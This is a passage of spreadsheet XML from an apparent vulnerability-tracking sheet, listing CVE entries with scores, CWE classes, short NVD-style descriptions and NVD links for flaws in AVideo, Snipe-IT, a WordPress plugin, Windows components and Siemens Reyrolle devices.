t="inlineStr"><is><t>HIGH</t></is></c><c r="F885" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G885" s="5" t="inlineStr" /><c r="H885" s="5" t="n"><v>0.001</v></c><c r="I885" s="5" t="inlineStr" /><c r="J885" s="5" t="inlineStr" /><c r="K885" s="5" t="inlineStr" /><c r="L885" s="5" t="inlineStr" /><c r="M885" s="5" t="inlineStr" /><c r="N885" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O885" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P885" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q885" s="5" t="inlineStr" /><c r="R885" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S885" s="5" t="inlineStr"><is><t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in plugin/YPTWallet/view/saveBalance.php that allows attackers to set arbitrary wallet balances by relying only on session cookies without token validation. Attackers can craft a malicious webpage that, when loaded by an administrator, submits a POST request to modify any user's wallet balance to any value.</t></is></c><c r="T885" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t></is></c></row><row r="886"><c r="A886" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B886" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C886" s="5" t="inlineStr"><is><t>CVE-2026-86725</t></is></c><c r="D886" s="5" t="n"><v>7.1</v></c><c r="E886" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G886" s="5" t="inlineStr" /><c r="H886" s="5" t="n"><v>0.003</v></c><c r="I886" s="5" t="inlineStr" /><c r="J886" s="5" t="inlineStr" /><c r="K886" s="5" t="inlineStr" /><c r="L886" s="5" t="inlineStr" /><c r="M886" s="5" t="inlineStr" /><c r="N886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q886" s="5" t="inlineStr" /><c r="R886" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S886" s="5" t="inlineStr"><is><t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains a missing authorization vulnerability in the SocialMediaPublisher plugin's add.json.php endpoint that allows authenticated users to modify other users' OAuth token records. Attackers can supply arbitrary row IDs to overwrite another user's stored access_token and refresh_token, then delete the compromised record to destroy the victim's provider linkage.</t></is></c><c r="T886" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t></is></c></row><row r="887"><c r="A887" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B887" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C887" s="5" t="inlineStr"><is><t>CVE-2026-86734</t></is></c><c r="D887" s="5" t="n"><v>7.1</v></c><c r="E887" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F887" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G887" s="5" t="inlineStr" /><c r="H887" s="5" t="n"><v>0.003</v></c><c r="I887" s="5" t="inlineStr" /><c r="J887" s="5" t="inlineStr" /><c r="K887" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L887" s="5" t="inlineStr" /><c r="M887" s="5" t="inlineStr" /><c r="N887" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O887" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P887" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q887" s="5" t="inlineStr" /><c r="R887" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S887" s="5" t="inlineStr"><is><t>Snipe-IT before 8.7.1 fails to validate the length of the note field in the POST /account/accept/{acceptance} endpoint, allowing authenticated users to submit unbounded input that reaches synchronous CommonMark rendering. Attackers can submit large note values to exhaust PHP worker CPU and cause denial of service through resource exhaustion in the markdown parsing pipeline.</t></is></c><c r="T887" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t></is></c></row><row r="888"><c r="A888" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B888" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C888" s="5" t="inlineStr"><is><t>CVE-2026-9331</t></is></c><c r="D888" s="5" t="n"><v>7.1</v></c><c r="E888" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F888" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G888" s="5" t="inlineStr" /><c r="H888" s="5" t="n"><v>0.002</v></c><c r="I888" s="5" t="inlineStr" /><c r="J888" s="5" t="inlineStr" /><c r="K888" s="5" t="inlineStr" /><c r="L888" s="5" t="inlineStr" /><c r="M888" s="5" t="inlineStr" /><c r="N888" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q888" s="5" t="inlineStr" /><c r="R888" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S888" s="5" t="inlineStr"><is><t>The EDD Product Catalog Feed by PixelYourSite plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the wpeddpcf_delete_feed function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.</t></is></c><c r="T888" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t></is></c></row><row r="889"><c r="A889" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B889" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C889" s="5" t="inlineStr"><is><t>CVE-2026-50349</t></is></c><c r="D889" s="5" t="n"><v>7</v></c><c r="E889" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F889" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G889" s="5" t="inlineStr" /><c r="H889" s="5" t="n"><v>0.002</v></c><c r="I889" s="5" t="inlineStr" /><c r="J889" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K88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89" s="5" t="inlineStr" /><c r="M889" s="5" t="inlineStr" /><c r="N889" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O889" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P889" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q889" s="5" t="inlineStr" /><c r="R889" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S889" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T889" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t></is></c></row><row r="890"><c r="A890" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B890" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C890" s="5" t="inlineStr"><is><t>CVE-2026-58848</t></is></c><c r="D890" s="5" t="n"><v>7</v></c><c r="E890" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F890" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G890" s="5" t="inlineStr" /><c r="H890" s="5" t="n"><v>0.001</v></c><c r="I890" s="5" t="inlineStr" /><c r="J890" s="5" t="inlineStr" /><c r="K890" s="5" t="inlineStr" /><c r="L890" s="5" t="inlineStr" /><c r="M890" s="5" t="inlineStr" /><c r="N890" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q890" s="5" t="inlineStr" /><c r="R890" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S890" s="5" t="inlineStr"><is><t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T890" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t></is></c></row><row r="891"><c r="A891" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B891" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C891" s="5" t="inlineStr"><is><t>CVE-2026-62653</t></is></c><c r="D891" s="5" t="n"><v>7</v></c><c r="E891" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F891" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G891" s="5" t="inlineStr" /><c r="H891" s="5" t="n"><v>0.002</v></c><c r="I891" s="5" t="inlineStr" /><c r="J891" s="5" t="inlineStr" /><c r="K891" s="5" t="inlineStr" /><c r="L891" s="5" t="inlineStr" /><c r="M891" s="5" t="inlineStr" /><c r="N891" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O891" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P891" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q891" s="5" t="inlineStr" /><c r="R891" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S891" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The input received over a proprietary communication protocol that is exposed when the device is placed into a special firmware-update mode is not properly validated, resulting in a memory corruption condition. This could allow an unauthenticated attacker with physical access to the device to cause a crash and potentially execute arbitrary code on the device.</t></is></c><c r="T891" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t></is></c></row><row r="892"><c r="A892" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B892" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C892" s="5" t="inlineStr"><is><t>CVE-2026-62654</t></is></c><c r="D892" s="5" t="n"><v>7</v></c><c r="E892" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F892" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G892" s="5" t="inlineStr" /><c r="H892" s="5" t="n"><v>0.001</v></c><c r="I892" s="5" t="inlineStr" /><c r="J892" s="5" t="inlineStr" /><c r="K892" s="5" t="inlineStr" /><c r="L892" s="5" t="inlineStr" /><c r="M892" s="5" t="inlineStr" /><c r="N892" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q892" s="5" t="inlineStr" /><c r="R892" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="S892" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A special maintenance mode can be activated via a physical key sequence during device boot, in which the device downloads and executes program code from a network server without verifying its authenticity or integrity. This could allow an attacker with physical access to the device to upload and execute arbitrary, unsigned code.</t></is></c><c r="T892" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t></is></c></row><row r="893"><c r="A893" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B893" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C893" s="5" t="inlineStr"><is><t>CVE-2026-62694</t></is></c><c r="D893" s="5" t="n"><v>7</v></c><c r="E893" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F893" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G893" s="5" t="inlineStr" /><c r="H893" s="5" t="n"><v>0.003</v></c><c r="I893" s="5" t="inlineStr" /><c r="J893" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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93" s="5" t="inlineStr" /><c r="M893" s="5" t="inlineStr" /><c r="N893" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O893" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P893" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q893" s="5" t="inlineStr" /><c r="R893" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S893" s="5" t="inlineStr"><is><t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T893" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t></is></c></row><row r="894"><c r="A894" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B894" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C894" s="5" t="inlineStr"><is><t>CVE-2026-68824</t></is></c><c r="D894" s="5" t="n"><v>7</v></c><c r="E894" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F894" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G894" s="5" t="inlineStr" /><c r="H894" s="5" t="n"><v>0.002</v></c><c r="I894" s="5" t="inlineStr" /><c r="J894" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K894" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L894" s="5" t="inlineStr" /><c r="M894" s="5" t="inlineStr" /><c r="N894" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O894" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P894" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q894" s="5" t="inlineStr" /><c r="R894" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S894" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T894" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t></is></c></row><row r="895"><c r="A895" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B895" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C895" s="5" t="inlineStr"><is><t>CVE-2026-68825</t></is></c><c r="D895" s="5" t="n"><v>7</v></c><c r="E895" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F895" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G895" s="5" t="inlineStr" /><c r="H895" s="5" t="n"><v>0.003</v></c><c r="I895" s="5" t="inlineStr" /><c r="J895" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K895" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L895" s="5" t="inlineStr" /><c r="M895" s="5" t="inlineStr" /><c r="N895" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O895" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P895" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q895" s="5" t="inlineStr" /><c r="R895" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S895" s="5" t="inlineStr"><is><t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T895" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t></is></c></row><row r="896"><c r="A896" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B896" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C896" s="5" t="inlineStr"><is><t>CVE-2026-68837</t></is></c><c r="D896" s="5" t="n"><v>7</v></c><c r="E896" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F896" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G896" s="5" t="inlineStr" /><c r="H896" s="5" t="n"><v>0.002</v></c><c r="I896" s="5" t="inlineStr" /><c r="J896" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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896" s="5" t="inlineStr" /><c r="M896" s="5" t="inlineStr" /><c r="N896" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O896" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P896" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q896" s="5" t="inlineStr" /><c r="R896" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S896" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T896" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t></is></c></row><row r="897"><c r="A897" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B897" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C897" s="5" t="inlineStr"><is><t>CVE-2026-68840</t></is></c><c r="D897" s="5" t="n"><v>7</v></c><c r="E897" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F897" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G897" s="5" t="inlineStr" /><c r="H897" s="5" t="n"><v>0.002</v></c><c r="I897" s="5" t="inlineStr" /><c r="J897" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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97" s="5" t="inlineStr" /><c r="M897" s="5" t="inlineStr" /><c r="N897" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O897" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P897" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q897" s="5" t="inlineStr" /><c r="R897" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S897" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T897" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t></is></c></row><row r="898"><c r="A898" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B898" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C898" s="5" t="inlineStr"><is><t>CVE-2026-68847</t></is></c><c r="D898" s="5" t="n"><v>7</v></c><c r="E898" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F898" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G898" s="5" t="inlineStr" /><c r="H898" s="5" t="n"><v>0.002</v></c><c r="I898" s="5" t="inlineStr" /><c r="J898" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K898" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L898" s="5" t="inlineStr" /><c r="M898" s="5" t="inlineStr" /><c r="N898" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O898" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P898" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q898" s="5" t="inlineStr" /><c r="R898" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S898" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T898" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t></is></c></row><row r="899"><c r="A899" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B899" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C899" s="5" t="inlineStr"><is><t>CVE-2026-68884</t></is></c><c r="D899" s="5" t="n"><v>7</v></c><c r="E899" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F899" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G899" s="5" t="inlineStr" /><c r="H899" s="5" t="n"><v>0.003</v></c><c r="I899" s="5" t="inlineStr" /><c r="J899" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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899" s="5" t="inlineStr" /><c r="M899" s="5" t="inlineStr" /><c r="N899" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O899" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P899" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q899" s="5" t="inlineStr" /><c r="R899" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S899" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T899" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t></is></c></row><row r="900"><c r="A900" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B900" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C900" s="5" t="inlineStr"><is><t>CVE-2026-68897</t></is></c><c r="D900" s="5" t="n"><v>7</v></c><c r="E900" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F900" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G900" s="5" t="inlineStr" /><c r="H900" s="5" t="n"><v>0.002</v></c><c r="I900" s="5" t="inlineStr" /><c r="J900" s="5" t="inlineStr" /><c r="K900" s="5" t="inlineStr" /><c r="L900" s="5" t="inlineStr" /><c r="M900" s="5" t="inlineStr" /><c r="N900" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O900" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P900" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q900" s="5" t="inlineStr" /><c r="R900" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S900" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T900" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t></is></c></row><row r="901"><c r="A901" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B901" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C901" s="5" t="inlineStr"><is><t>CVE-2026-69275</t></is></c><c r="D901" s="5" t="n"><v>7</v></c><c r="E901" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F901" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G901" s="5" t="inlineStr" /><c r="H901" s="5" t="n"><v>0.002</v></c><c r="I901" s="5" t="inlineStr" /><c r="J901" s="5" t="inlineStr" /><c r="K901" s="5" t="inlineStr" /><c r="L901" s="5" t="inlineStr" /><c r="M901" s="5" t="inlineStr" /><c r="N901" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O901" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P901" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q901" s="5" t="inlineStr" /><c r="R901" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S901" s="5" t="inlineStr"><is><t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T901" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t></is></c></row><row r="902"><c r="A902" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B902" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C902" s="5" t="inlineStr"><is><t>CVE-2026-69279</t></is></c><c r="D902" s="5" t="n"><v>7</v></c><c r="E902" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F902" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G902" s="5" t="inlineStr" /><c r="H902" s="5" t="n"><v>0.003</v></c><c r="I902" s="5" t="inlineStr" /><c r="J902" s="5" t="inlineStr" /><c r="K902" s="5" t="inlineStr" /><c r="L902" s="5" t="inlineStr" /><c r="M902" s="5" t="inlineStr" /><c r="N902" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O902" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P902" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q902" s="5" t="inlineStr" /><c r="R902" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S902" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T902" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t></is></c></row><row r="903"><c r="A903" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B903" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C903" s="5" t="inlineStr"><is><t>CVE-2026-69280</t></is></c><c r="D903" s="5" t="n"><v>7</v></c><c r="E903" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F903" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G903" s="5" t="inlineStr" /><c r="H903" s="5" t="n"><v>0.002</v></c><c r="I903" s="5" t="inlineStr" /><c r="J903" s="5" t="inlineStr" /><c r="K903" s="5" t="inlineStr" /><c r="L903" s="5" t="inlineStr" /><c r="M903" s="5" t="inlineStr" /><c r="N903" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O903" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P903" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q903" s="5" t="inlineStr" /><c r="R903" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S903" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T903" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t></is></c></row><row r="904"><c r="A904" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B904" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C904" s="5" t="inlineStr"><is><t>CVE-2026-69281</t></is></c><c r="D904" s="5" t="n"><v>7</v></c><c r="E904" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F904" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G904" s="5" t="inlineStr" /><c r="H904" s="5" t="n"><v>0.003</v></c><c r="I904" s="5" t="inlineStr" /><c r="J904" s="5" t="inlineStr" /><c r="K904" s="5" t="inlineStr" /><c r="L904" s="5" t="inlineStr" /><c r="M904" s="5" t="inlineStr" /><c r="N904" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O904" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P904" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q904" s="5" t="inlineStr" /><c r="R904" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S904" s="5" t="inlineStr"><is><t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T904" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t></is></c></row><row r="905"><c r="A905" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B905" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C905" s="5" t="inlineStr"><is><t>CVE-2026-69287</t></is></c><c r="D905" s="5" t="n"><v>7</v></c><c r="E905" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F905" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G905" s="5" t="inlineStr" /><c r="H905" s="5" t="n"><v>0.002</v></c><c r="I905" s="5" t="inlineStr" /><c r="J905" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K90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05" s="5" t="inlineStr" /><c r="M905" s="5" t="inlineStr" /><c r="N905" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O905" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P905" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q905" s="5" t="inlineStr" /><c r="R905" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S905" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T905" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t></is></c></row><row r="906"><c r="A906" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B906" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C906" s="5" t="inlineStr"><is><t>CVE-2026-69292</t></is></c><c r="D906" s="5" t="n"><v>7</v></c><c r="E906" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F906" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G906" s="5" t="inlineStr" /><c r="H906" s="5" t="n"><v>0.002</v></c><c r="I906" s="5" t="inlineStr" /><c r="J906" s="5" t="inlineStr" /><c r="K906" s="5" t="inlineStr" /><c r="L906" s="5" t="inlineStr" /><c r="M906" s="5" t="inlineStr" /><c r="N906" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O906" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P906" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q906" s="5" t="inlineStr" /><c r="R906" 